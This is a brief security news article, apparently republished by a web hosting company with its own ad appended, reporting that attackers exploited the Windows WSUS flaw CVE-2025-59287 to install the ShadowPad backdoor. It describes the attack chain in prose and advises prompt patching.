A recently patched security vulnerability in Microsoft Windows Server Update Services (WSUS) has been exploited by cybercriminals to deploy the ShadowPad malware. This incident highlights a serious threat, as the attackers leveraged the known CVE-2025-59287 flaw to gain initial access to targeted systems.
According to the AhnLab Security Intelligence Center (ASEC), the attackers targeted Windows Servers with WSUS enabled. They exploited the vulnerability to achieve a system shell using a PowerShell-based tool called PowerCat. Following this, they were able to download and install the ShadowPad malware using Windows utilities like certutil and curl.
ShadowPad, which has been associated with Chinese cybersecurity threats, is known to be a versatile backdoor, facilitating various forms of malicious activities. It emerged in 2015 and is considered a sophisticated malware tool now utilized by state-sponsored hacking groups. Analysts previously referred to it as a standout offering in the realm of state-sponsored cyber espionage.
CVE-2025-59287 is a critical deserialization vulnerability, enabling remote code execution with system privileges. Although Microsoft issued a patch for this flaw last month, it has faced heavy exploitation since its discovery. Attackers have been using the vulnerability to access publicly exposed WSUS instances, conduct reconnaissance, and even deploy legitimate tools designed for security analysis.
The attackers have specifically been noted to utilize legitimate Windows binaries such as "ETDCtrlHelper.exe" to load a malicious DLL payload ("ETDApix.dll") as part of their operation. Once installed, ShadowPad is engineered to manage additional plugins as part of its shellcode while employing various tactics to evade detection and maintain persistence.
As the cybersecurity landscape continues to evolve, it is critically important for organizations to promptly install patches and consider potential exposure from known vulnerabilities, particularly those that allow for significant access and control over systems.
For further details on the vulnerabilities and malware discussed, you can explore more about the CVE-2025-59287 vulnerability and ShadowPad malware.
Hudson Valley Host is premier provider of cutting-edge hosting solutions, specializing in delivering a seamless online experience for businesses and individuals. We offer a comprehensive range of hosting services, including Shared Hosting, VPS, Dedicated Servers, and Colocation. With 24/7 technical support, robust security measures, and user-friendly control panels, we empower clients in managing their online presence effortlessly. Hudson Valley Host is your trusted partner in achieving online success.
For Inquiries or to receive a personalized quote, please reach out to us through our contact form here or email us at sales@hudsonvalleyhost.com.
